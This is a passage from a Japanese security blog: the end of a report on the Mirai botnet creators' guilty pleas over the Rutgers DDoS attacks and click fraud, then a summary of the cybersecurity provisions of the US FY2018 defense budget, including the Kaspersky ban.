Rutgers大学へのDDoS攻撃は執拗に行われ、大学のサーバーが継続的にダウンする事態に陥っていたという。
Rutgers大学に対してDDoS攻撃が発生している最中、大学のオンライン掲示板に、“og_richard_stallman”、“exfocus”、“ogexfocus”と名乗る人物から「DDoS攻撃を鎮静するサービスを導入すべきだ」というコメントが執拗にされていた。
このコメントは、JhaとWhiteが創設したProtraf Solutions LLCのサービスを使う事を暗に指示している事は言うまでもないだろう。
ニュージャージー州のメディアによれば、同州の裁判所はJhaRutgers大学に対して発生したDDoS攻撃の犯人もJhaであると断定。
Jhaに対して有罪判決を言い渡した。
償い
Jhaは、クリック詐欺に対する訴状に関して、罰金の13BTCを支払うことに同意している。
また、Jhaは今後Jhaの行なったサイバー攻撃に関するいかなる判決に対して控訴する権利を放棄し、「いかなる刑を甘んじて受け入れる」と語る。
Jha、White、Normanが行なったクリック詐欺には、それぞれ5年の懲役と$250,000の罰金が課されている。
Miraiボットネットを作成した罪に関しては、JhaとWhiteは刑法18 U.S.C. 1030(a)(5)(A)に違反したとされている。*1
更に、Miraiボットネットのソースコードを公開した件についてもJhaとWhiteに対して有罪とされ、最低5年以下の懲役、$250,000の罰金、最低3年の執行猶予が言い渡された。
現在も公判が行われているので、JhaとWhiteには更なる求刑がされるだろう。
更新情報
- 2017/12/14 初稿
- 2017/12/15 ワンクリック詐欺→クリック詐欺に訂正。Cheena (ちーな)さんご指摘ありがとうございました。(Cheenaさんのブログはこちら)
*1:18 U.S.C. 1030(a)(5)(A)は、”保護されたコンピュータから別のコンピュータへのプログラム、コード、コマンドの実行を妨げ、データ、プログラム、システム、又は情報の整合性と可用性を損ってはならない”事を定めている。
トランプ大統領が2018年度防衛予算案に署名。カスペルスキー製品使用禁止。
アメリカのメディアによれば、来年度(2018年)の予算案には、サイバーセキュリティ分野に関する法案が盛り込まれたという。
そこで、どのような法案に署名されたのかをこの記事では紹介していきたい。
法案が含まれるのは防衛予算案
今回トランプ大統領が署名した法案は、来年度のアメリカ政府の防衛予算案の一部である。
そもそも防衛予算案は、主にアメリカ政府がアメリカ軍に対してどのように予算を割り当てるのか決定するものだ。
防衛予算案については、アメリカ合衆国議会のホームページに掲載されている。
以下の画像は、今回トランプ大統領が署名した防衛予算案の1ページ目である。
この防衛予算案を下に辿ると、
”Subtitle C—Cyberspace-Related Matters”
という項目があり、更に以下の様に法案が記載されている。
サイバーセキュリティ関連の法案は、
- PART I—GENERAL CYBER MATTERS
- PART II—CYBERSECURITY EDUCATION
の2つのパートに分かれており、
PART Iには、”全般的なサイバーセキュリティ関連の法案”、
PART IIには、”サイバーセキュリティ教育に関する法案”が記載されている。
それでは、今回トランプ大統領によって署名された防衛予算案に含まれる、サイバーセキュリティに関する法案に関して以下にまとめる。
SEC.1634:カスペルスキー製品の使用禁止
(Sec. 1634. Prohibition on use of products and services developed or provided by Kaspersky Lab)
ロシアのセキュリティ企業カスペルスキー研究所の製品を、政府機関で使用する事を禁止する法案。
実は2017年9月時点で、トランプ政権はカスペルスキー研究所の製品を90日以内に使用停止するように要請していた。
その段階では”要請”だったのだが、今回法案に署名がされた事で、”公式”にカスペルスキー製品を米国政府関連組織のネットワークから排除する運びとなった。
この法案が意味するのは、ロシアに対する警戒だけではない。
アメリカ国内のセキュリティ企業の製品を積極的に使用していく事で、アメリカのセキュリティ業界に政府のお金が流れていくだろう。
そうすればセキュリティ企業は更に研究開発に投資する事ができる。
SEC.1634:サイバー空間に関するアメリカの政策制定
(Sec. 1633. Policy of the United States on cyberspace, cybersecurity, and cyber warfare.)
アメリカ政府として、サイバー空間、サイバーセキュリティ、サイバー戦争に関する国全体としての政策を定める事を取り決める法案。
この法案に署名された事で国の予算が割かれ、政策を作成していく事になる。
この法案がカバーするのはサイバー空間における”抑止力”・”防衛”・”攻撃”の3分野である事から、アメリカ政府が本腰を入れてサイバーセキュリティ分野に取り組んでいく事が伺える。
尚、政策が作成される期日は定まっていない。
SEC. 1603:アメリカ国外の衛星技術の導入禁止
(Sec. 1603. Foreign commercial satellite services: cybersecurity threats and launches.)
アメリカ合衆国は衛星技術を完全に内製化していくようだ。
国防において、衛星技術は重要な通信インフラである事から、政府としては他国の技術や製品を導入してバックドアが仕込まれる可能性は一切排除したい。
カスペルスキー製品の使用禁止からも見られるが、トランプ政権の諸外国に対する姿勢は一貫している。
セキュリティに関する技術の内製化は、トランプ大統領が選挙中から訴えている”MAKE AMERICA GREAT AGAIN”というスローガンに伺えるナショナリズムにも起因しているだろう。
SEC. 1649:サイバーセキュリティ教育の強化
Sec. 1649. Cyber Scholarship Program.
アメリカ国立科学財団(National Science Foundation、以下、NSF)はアメリカ合衆国人事管理局(Office of Personnel Management、以下、OPM)と協働でサイバーセキュリティ教育を強化していく法案である。
アメリカにある5〜10のコミュニティカレッジと連携して、アメリカ全土に散財する才能を持った人材を育成・リクルーティングする教育プログラムが展開されていく。
また、全体の予算の内5%をサイバーセキュリティ教育に割くことを定めている。
この法案によって、アメリカ国内に埋もれている優秀なセキュリティ人材が発掘される可能性が高まったので喜ばしいことだ。
